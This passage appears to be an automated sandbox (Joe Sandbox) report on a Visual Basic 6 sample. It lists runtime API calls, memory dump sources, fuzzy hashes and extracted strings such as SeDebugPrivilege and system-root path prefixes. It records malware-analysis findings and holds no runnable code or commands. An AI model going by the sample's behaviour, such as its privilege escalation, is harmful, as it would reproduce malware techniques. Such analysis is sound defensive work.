                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$BstrFile$#516#631Error$#525#570#648ChkstkCloseCopyGet3OpenOverflowSeek
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2204187013-0
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaAryConstruct2.MSVBVM60(?,004075E8,00000011,00000000,72A0C33A,7294A3D7), ref: 00416207
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,?,00000040,?,00000000), ref: 00416231
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000002), ref: 00416242
                                                                                                                                                            • #537.MSVBVM60(00000000), ref: 00416252
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041625F
                                                                                                                                                            • #537.MSVBVM60(?,00000000), ref: 0041626B
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00416272
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 00416275
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00416280
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(004075CC,00000000), ref: 00416288
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004162A5
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 004162D9
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 004162EF
                                                                                                                                                            • #537.MSVBVM60(?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416300
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416307
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(004075E0,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041630F
                                                                                                                                                            • #537.MSVBVM60(00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416326
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041632D
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(004075D8,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416335
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041636D
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,004163C6), ref: 004163BF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$#537ErrorSystem$FreeList$Construct2Destruct
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2170920009-0
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaOnError.MSVBVM60(00000001), ref: 0040E391
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,004071DC), ref: 0040E39F
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E3AA
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4), ref: 0040E3D0
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040E3DD
                                                                                                                                                            • __vbaCastObj.MSVBVM60(00000000,004071DC), ref: 0040E3F0
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040E3FB
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4), ref: 0040E41B
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040E420
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007BC), ref: 0040E445
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,004071EC,00000078), ref: 0040E465
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0040E46D
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007B0), ref: 0040E494
                                                                                                                                                            • #519.MSVBVM60(?), ref: 0040E49A
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040E4A5
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040E4B9
                                                                                                                                                            • __vbaFreeObj.MSVBVM60 ref: 0040E4C5
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?), ref: 0040E4CF
                                                                                                                                                            • __vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 0040E4FC
                                                                                                                                                            • __vbaExitProc.MSVBVM60 ref: 0040E50E
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0040E546), ref: 0040E53F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$CheckFreeHresult$Cast$#519BstrCopyErrorEventExitListMoveProcRaise
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2502233557-0
                                                                                                                                                            APIs
                                                                                                                                                            • #712.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BAC
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BB9
                                                                                                                                                            • #712.MSVBVM60(?,\\?\,00406674,00000001,000000FF,00000000,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410BCE
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BD5
                                                                                                                                                            • #712.MSVBVM60(?,\SystemRoot\,?,00000001,000000FF,00000001,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410BEC
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BF3
                                                                                                                                                            • #712.MSVBVM60(?,%systemroot%,?,00000001,000000FF,00000001,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410C0B
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C12
                                                                                                                                                            • #712.MSVBVM60(?,00407458,004055FC,00000001,000000FF,00000000,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410C27
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C2E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C36
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00410C57,?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C50
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$#712Move$CopyFree
                                                                                                                                                            • String ID: %systemroot%$\??\$\SystemRoot\$\\?\
                                                                                                                                                            • API String ID: 2546659950-1311169778
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
                                                                                                                                                            • String ID: (%@
                                                                                                                                                            • API String ID: 3031735744-1462787901
                                                                                                                                                            • Opcode ID: 566f84c16e9852cbe43a341eb0fc3600b6bd4deadf9746a13e5076369c76cc33
                                                                                                                                                            • Instruction ID: 2163017d223cc4516af4853558ee8a19d87b4fb9e6127d64d5f8f75e22c004d5
                                                                                                                                                            • Opcode Fuzzy Hash: 566f84c16e9852cbe43a341eb0fc3600b6bd4deadf9746a13e5076369c76cc33
                                                                                                                                                            • Instruction Fuzzy Hash: C731FBB5800209ABCB04DFE4DE59FDE7B78FB48714F108569F211B72A0D7746A48CB68
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00401D48,004072B8,?,00000001), ref: 0040FE20
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FE2D
                                                                                                                                                            • __vbaStrCat.MSVBVM60(004072C0,00000000), ref: 0040FE35
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FE3C
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,00000000), ref: 0040FE40
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040FE52
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00401D48,00407390,?,-00000001), ref: 0040FE80
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,-00000001), ref: 0040FE87
                                                                                                                                                            • __vbaStrCat.MSVBVM60(004072C0,00000000,?,-00000001), ref: 0040FE8F
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,-00000001), ref: 0040FE96
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,00000000,?,-00000001), ref: 0040FE9B
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,-00000001), ref: 0040FEAD
                                                                                                                                                            • __vbaLenBstr.MSVBVM60 ref: 0040FEC0
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,?), ref: 0040FEF3
                                                                                                                                                            • #631.MSVBVM60(?,-00000002,?,?), ref: 0040FF09
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,-00000002,?,?), ref: 0040FF14
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,-00000002,?,?), ref: 0040FF19
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 0040FF69
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$BstrList$#631ErrorOverflow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 43011225-0
                                                                                                                                                            • Opcode ID: 885353d30146d4874439d9188de8ce179380beda0541da3dfd58a4a737dd6ec3
                                                                                                                                                            • Instruction ID: f3b2892753be04fed0370ccfbe7307407226e01e24b32ae3149310476cb42e92
                                                                                                                                                            • Opcode Fuzzy Hash: 885353d30146d4874439d9188de8ce179380beda0541da3dfd58a4a737dd6ec3
                                                                                                                                                            • Instruction Fuzzy Hash: C7417475A00209AFD714DFA4CD85E9E7B79FB89700F10413BF901B76A0DA74A948CBA4
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaRecUniToAnsi.MSVBVM60(00404BAC,?,?), ref: 0041103F
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041104B
                                                                                                                                                            • __vbaRecAnsiToUni.MSVBVM60(00404BAC,00000094,?), ref: 00411064
                                                                                                                                                            • __vbaStrI4.MSVBVM60(?), ref: 00411077
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00411087
                                                                                                                                                            • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 00411095
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041109F
                                                                                                                                                            • __vbaStrI4.MSVBVM60(?,00000000), ref: 004110A9
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004110B3
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 004110B6
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004110C0
                                                                                                                                                            • __vbaStrCat.MSVBVM60(004057CC,00000000), ref: 004110C8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004110D2
                                                                                                                                                            • __vbaStrI4.MSVBVM60(?,00000000), ref: 004110DC
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004110E6
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000), ref: 004110E9
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004110F3
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 00411121
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Ansi$ErrorFreeListSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 669208520-0
                                                                                                                                                            • Opcode ID: 15d97e58667047e38884c40753fbc310222c58e867efe20913db211b95d16ab2
                                                                                                                                                            • Instruction ID: 84428951c38bdac4841b214fd1cb50a500f43101e76cc919ffdd761ca84df74b
                                                                                                                                                            • Opcode Fuzzy Hash: 15d97e58667047e38884c40753fbc310222c58e867efe20913db211b95d16ab2
                                                                                                                                                            • Instruction Fuzzy Hash: AD410EB1D00218ABCB65EB65CD44BEABBB9EF48700F1041EAE509B3160DE746F85CF94
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(72A219DC,00000000,00000FEE), ref: 00418FAE
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(72A219DC,00000000,00000FEE), ref: 00418FC2
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 00418FE9
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 00419003
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 0041901E
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00419022
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 0041902E
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00419049
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00419052
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000,?), ref: 0041907B
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 0041908B
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 00419091
                                                                                                                                                            • __vbaPutOwner3.MSVBVM60(00407524,?,?), ref: 004190A4
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(72A219DC,00000000,00000FEE), ref: 004190D1
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60(72A219DC,00000000,00000FEE), ref: 004190E1
                                                                                                                                                            • __vbaAryDestruct.MSVBVM60(00000000,?,0041912C), ref: 00419125
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60(72A219DC,00000000,00000FEE), ref: 0041913F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$BoundsGenerate$LockUnlock$DestructOverflowOwner3RedimSystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3281955820-0
                                                                                                                                                            • Opcode ID: a8d7f946882eaeb5c4532af24fa3ee9707f2f5aa847c5e00e51107734879214e
                                                                                                                                                            • Instruction ID: 4833bfc8c810be8c7ee48596b44bcdea636671ab31cf8706ef4dadcd7055b152
                                                                                                                                                            • Opcode Fuzzy Hash: a8d7f946882eaeb5c4532af24fa3ee9707f2f5aa847c5e00e51107734879214e
                                                                                                                                                            • Instruction Fuzzy Hash: 4A51B470A00215AFDB14DF64DDA5AFABBB5FB49740F21802AE505A7350C774ACC2CBA9
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(?,004025E6), ref: 0040ACBE
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AD05
                                                                                                                                                            • __vbaStrCat.MSVBVM60( RO,?,?,?,?,?,004025E6), ref: 0040AD3D
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040AD48
                                                                                                                                                            • __vbaStrCat.MSVBVM60(Once,?,?,00000000,?,?,?,?,004025E6), ref: 0040AD61
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040AD6C
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000,?,?,?,?,004025E6), ref: 0040AD87
                                                                                                                                                            • __vbaStrCat.MSVBVM60( RO,?,?,?,004025E6), ref: 0040ADA2
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,004025E6), ref: 0040ADAD
                                                                                                                                                            • __vbaStrCat.MSVBVM60(Once,?,?,00000000,?,?,004025E6), ref: 0040ADC7
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,004025E6), ref: 0040ADD2
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,?,004025E6), ref: 0040ADED
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$FreeList$ChkstkError
                                                                                                                                                            • String ID: RO$Once
                                                                                                                                                            • API String ID: 3210543181-275216174
                                                                                                                                                            • Opcode ID: 1063fae4adbd8224e8995746d70fbb9a1f5e9435d9e4a9119fec7327904956c2
                                                                                                                                                            • Instruction ID: 52c490b129e582bc3dafaca85e5bb0199f8b140a8a0a8e676f0dccd7654b22b4
                                                                                                                                                            • Opcode Fuzzy Hash: 1063fae4adbd8224e8995746d70fbb9a1f5e9435d9e4a9119fec7327904956c2
                                                                                                                                                            • Instruction Fuzzy Hash: C9413471900208EFD704DF94DE49BEEBBB8FB4C304F108129F916A72A0DB755A44CBA9
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,004100E0), ref: 00410C8E
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,00000000,72A26C30,72A20EBE,00000000,004025E6), ref: 00410CBE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60 ref: 00410CD3
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000028,?), ref: 00410CEB
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,?,0000001C,?,0000001C), ref: 00410D3B
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,SeDebugPrivilege,?), ref: 00410D5A
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000), ref: 00410D6B
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410D83
                                                                                                                                                            • __vbaCopyBytes.MSVBVM60(00000008,?,?), ref: 00410DE0
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 00410E35
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Error$System$AnsiBytesChkstkCopyFree
                                                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                                                            • API String ID: 1749655604-2896544425
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,?,?,?,?,?,?,004025E6), ref: 00418A2E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00418A5B
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00418A67
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF), ref: 00418A76
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?,?), ref: 00418A8F
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00418A9F
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00418AAD
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00418AB6
                                                                                                                                                            • __vbaStrToAnsi.MSVBVM60(?,?), ref: 00418ACB
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 00418ADB
                                                                                                                                                            • __vbaStrToUnicode.MSVBVM60(?,?), ref: 00418AE9
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00418AF2
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?), ref: 00418B08
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00418B32), ref: 00418B22
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00418B2B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3031735744-0
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(72A26C30,72A26A76,00000000), ref: 0040FFAA
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000001), ref: 0040FFBD
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FFCA
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,00000000), ref: 0040FFCE
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 0040FFE2
                                                                                                                                                            • #537.MSVBVM60(00000000,?,00000001), ref: 0040FFF5
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040FFFC
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,00000000), ref: 00410001
                                                                                                                                                            • #616.MSVBVM60(?,-00000001), ref: 00410011
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0041001C
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 00410021
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 0041002D
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(0041005D), ref: 00410056
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00410073
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$FreeMove$#537Copy$#616ErrorOverflow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3249593964-0
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,72A26C30,00000000,72A256DE), ref: 0041975B
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 00419775
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 00419796
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004197A5
                                                                                                                                                            • __vbaAryLock.MSVBVM60(?,?), ref: 004197B2
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004197CD
                                                                                                                                                            • __vbaGenerateBoundsError.MSVBVM60 ref: 004197D6
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(00000000,00000000,?), ref: 004197F9
                                                                                                                                                            • __vbaAryUnlock.MSVBVM60(?), ref: 00419809
